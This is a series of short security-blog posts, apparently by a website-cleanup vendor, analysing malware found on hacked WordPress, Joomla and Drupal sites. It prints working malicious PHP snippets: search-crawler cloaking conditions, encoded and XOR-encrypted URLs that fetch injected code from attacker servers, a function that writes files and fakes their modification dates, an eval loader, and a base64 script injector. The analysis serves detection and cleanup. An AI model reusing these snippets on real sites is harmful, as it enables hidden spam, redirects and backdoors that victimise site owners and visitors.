Many black hat SEO campaigns use cloaking on hacked sites. Malicious scripts only inject spammy content when search engine crawlers request web pages on compromised sites. This time we came across an unusual cloaking condition.

We've been watching one spam campaign that uses php functions with names like __e_accelerate or __e_accelerate_engine for quite a long time. It normally used this cloaking condition:

if ((substr(trim($_SERVER['REMOTE_ADDR']),0,6)=='74.125') || preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'])) {...

The spam is being injected only if web pages are requested from Google's IPs (Google has an IP range that begins with '74.125') or if the request's User-Agent header belongs to crawlers of the most popular search engines: Google, Bing, Yahoo, Ask, etc. This condition is more or less typical to cloaking conditions used by the majority of other black hat SEO campaigns.

To our surprise, recently we found a variation of that e_accelerate malware that had the following cloaking condition:

if (!preg_match("/(ahrefs|majestic|baidu)/i", $_SERVER['HTTP_USER_AGENT'])) {...

So now this malware injects spam to requests from both search crawlers and humans. They only hide their spam from Ahrefs.com, Majestic (ex MajesticSEO) and Baidu. The exclusion rules look unusual, don't they?

Let's try to figure out what's going on. When checking the injected spammy text, I can see that it has scripts that make the text invisible in browsers that execute JavaScript (i.e. all modern browsers) so it's safe to "show" it human visitors.

To understand why they hide their spam from Ahrefs, Majestic and Baidu, we should know what these sites do.

Baidu is the #1 Chinese search engine. By hiding spammy links from Baidu, they prevent them from ranking well in China. So they are simply are not interested in Chinese traffic.

Ahrefs and Majestic are SEO tools that allow to view backlink profiles for any domain. They have their own crawlers, and the volumes of pages indexed by these tools are not much smaller than Google's index. This means that if we check information for domains used in spammy links, we can easily find hacked sites that link back to them. So the goal of hiding spammy links from Ahrefs and Majestic is preventing easy discovery of the sites hacked by this campaign.

By the way, they currently promote these sites:

• buycialistadalafil[.]org
• buycheapsildenafils[.]com
• writemypaper-online[.]us
• buy-essayforcheap[.]xyz

... and despite of the spammers' efforts, Majestic has backlink profiles for some of them 😉

This malware can be usually found in WordPress index.php or in Joomla! includes/defines.php files. If you need a professional help with cleanup, you can request it here

It's just a minor update about the "pseudo-darkleech" malware we've been following for about a year now.

We wrote that it can be usually located inside the wp-includes/nav-menu.php file in WordPress and in the includes/defines.php files in Joomla! sites. But these are not the only targeted CMS'. We also find Drupal sites infected by this malware. The includes/bootstrap.inc file is where this malware can be found in Drupal sites.

The malware fetches the code it injects into webpages from third-party servers. The URLs of those servers are encoded using the base64 algorithm, e.g.:

$url = base64_decode("aHR0cDovLzkzLjE4OS40Mi43Mi9ibG9nLz9mcmFnaWxlJnV0bV9zb3VyY2U9MjQ2NzoyNjAzODM6NDU1");

Which decodes to hxxp://93 .189 .42 .72/blog/?fragile&utm_source=2467:260383:455.

But there are versions that use a custom encryption/decryption algorithm.

$url = decrypt_url('a3d3czksLDI2Mi0xMjQtNjQtMjQ7LGFvbGQsPGFmd2IldnduXHBsdnFgZj41NTQxOzk1MTA3MTs5NDQ0');

Here's the decryption function:

function decrypt_url($encrypted_url)
{
    $encrypted_url = base64_decode($encrypted_url);
    $url = '';
    for ($i = 0; $i < strlen($encrypted_url); $i++)
    {
        $url .= chr(ord($encrypted_url[$i]) ^ 3);
    }
    return $url;
}

So the decoded URL is hxxp://151 .217. 57 .178/blog/?beta&utm_source=66728:623428:777

The rest of the code doesn't change much so we reliably detect this malware when we clean sites, even if we didn't see pseudo-darkleech on some particular CMS before.

Some webmasters only check recently modified files when searching for malware. It may work sometimes, but many infections don't change files' time-stamps. There is the "touch" PHP function that allows to set whatever modification time to any file.

If hackers create a new file, they chose a time-stamp of some neighbor file. If they inject code into an existing file, they simply save its original modification date and then restore it after the injection.

Today I want to show you a piece of code that also sets fake modification date to malicious files:

function change_content_of_file($file, $base64_content)
{
    $flag = false;

    @chmod($file, 0777);
    @chmod(dirname($file), 0777);
    $flag = @forceFilePutContents($file,  base64_decode($base64_content)) > 0;
    @chmod($file, 0444);
    @touch($file, time() - rand(60*60*24*30*12, 60*60*24*30*12*2));
    @touch(dirname($file), time() - rand(60*60*24*30*12, 60*60*24*30*12*2));
    @chmod(dirname($file), 0755);

    return $flag;
}

In this case, the code picks a random date between a year and two years back from now.

Don't limit your searches to recently modified files. Make sure to scan all files on your server. You don't have to do it manually. Integrity control systems will make the task much easier. Of course, you need to be absolutely sure all your files are clean at the moment when you put them under integrity control. If you already suspect that some of the files may contain malicious code then hire professionals - we'll scan all your files for thousands of malware patterns.

We see quite a few sites with the following injected PHP code:

//###=CACHE START=###
error_reporting(0); 
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXF...skipped...Tyvqwg9"));'));
//###=CACHE END=###

This malware contacts dfoiqweomxa[.]ru and fetches spam links from there. The spam mainly promotes Russian phishing and money laundering sites. Infected sites can be found all around the world. We found this spam even on sites of American and international universities.

Do you remember SweetCAPTCHA that tried to monetize its WordPress plugin injecting unwanted ads into web pages?

Today we've found another CAPTCHA plugin with a suspicious code. We cleaned a site and our scanner reported a suspicious obfuscated code inside the Captcha on Login plugin (45,000+ all time installs) files.

captcha-on-login/index.php
captcha-on-login/templates/report.php
captcha-on-login/templates/options.php

The obfuscation had strings like this:

...
${ "GL\x4f\x42\x41LS" }[ "\x64\x78cq\x70c\x6ax\x77\x6f\x63\x72" ]
...

When we see such things, we always try to decode them to figure out whether it's legitimate or not.

...
public function options_page(){
$meu_link="http://vendacomtrafegogratuito [.]com .br";$meu_link2="hxxp://hotplus [.]net .br/plugin-hotlinks-plus/?clear";include("templates/options.php");
$meu_link="hxxp://vendacomtrafegogratuito [.]com .br";$meu_link2="http://hotplus [.]net .br/ plugin-hotlinks-plus/?clear";
}
...

Looks like that the owner of this plugin, called "Anderson Makiyama" is a Brazilian developer who is the owner of these affiliate marketing websites:
hxxp://hotplus .net .br/ plugin-hotlinks-plus/
hxxp://funildevendasparainiciante .com .br/ onde-divulgar-links-de-afiliados/

This plugin seems to be only showing these links inside the WordPress admin interface on the plugin options and report pages as "Other products of the author" (Outros Produtos do Autor). It's maybe a bit annoying but doesn't seem to be a big deal. It's natural for plugin developers to pitch their other products (even such questionable ones) on the internal plugin pages (not visible to site users).

The only problem is that link injecting code is obfuscated. Not only does it result in warnings produced by security scanners, but this practice is considered unacceptable by the official WordPress Plugin Directory guidelines:

4. No obfuscated code. We believe that obfuscated code violates the spirit, if not the letter, of the GPL license under which we operate....
...Intentionally obfuscated code is not the preferred form, and not allowed in the repository under any circumstances.

It's sad to see how plugins that are supposed to help stop hackers, actually do things that resemble what hackers do. Sometimes you can find such plugins even in the official WordPress plugin directory.

If you are looking for alternative solutions against brute force attacks, you can check our Website Firewall.

Recently I analyzed a porn doorway script and found an interesting way to obfuscate an IP address there.

$adr1 = ".............................................................................................................................................................................";
$adr2 = "............................................................................................................................................................................................................................................";
$adr3 = ".................................................................";
$adr4 = "........................";
$ard = strlen($adr1).".".strlen($adr2).".".strlen($adr3).".".strlen($adr4);

In the above code, you can see that each byte of the IP address $adr is represented by a string of dots, where the number of dots in the string is the byte value.

This give us the following IP address: 173 .236 .65 .24, which is used to generate a redirect URL for the doorway visitors:

header("Location: hxxp://$ard/input/?mark=20151119-$s");

In our case, the final redirect URL was hxxp://173 . 236 . 65 . 24/input/?mark=20151119-/azq9mzo3v

This code was found in thousands of .php doorway files created by the attackers. This is the sort of a hack that may cause troubles even after you have completely cleaned your site. You can read about such scenarios on our blog. To prevent Googlebot from indexing and re-indexing tons of pages that shouldn\'t have been there in the first place, it may be a good idea to close spammy directories on your server with robots.txt directives.

If you find something like this on your server, it\'s only a tip of an iceberg. To stop the hackers, you need also to find and close all security holes (including the backdoors that they uploaded to your site). If you need a professional help in malware cleanup and site protection, please check our Website AntiVirus service.

Once active during the past summer, the g00[.]co script injections come with a new wave on infections this November.

The most common variation is

<script src="hxxp: / / g00[.]co/BtFVPd"></script>

This short URL hides the hxxp://yourjavascript[.]com/3921156982/not.js script, which in turn opens hxxp://speedclick[.]info/app/amung.php?c=a&s= for visitors that come from Facebook, Google, Bing and Yahoo!

On the server side, the malware is mainly injected into WordPress theme files. Usually you can find the following PHP code (in one line. Line breaks added for readability) in either footer.php or functions.php:

if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],
base64_decode("d3AtYWRtaW4=")) === false) 
{
echo base64_decode(base64_decode(base64_decode("VUVoT2Ft...skipped...edUFEwSw0K")));
}

It injects that g00 script into all site URLs that don't contain wp-admin.

As always, if you need site security monitoring and cleanup services, you can count on us.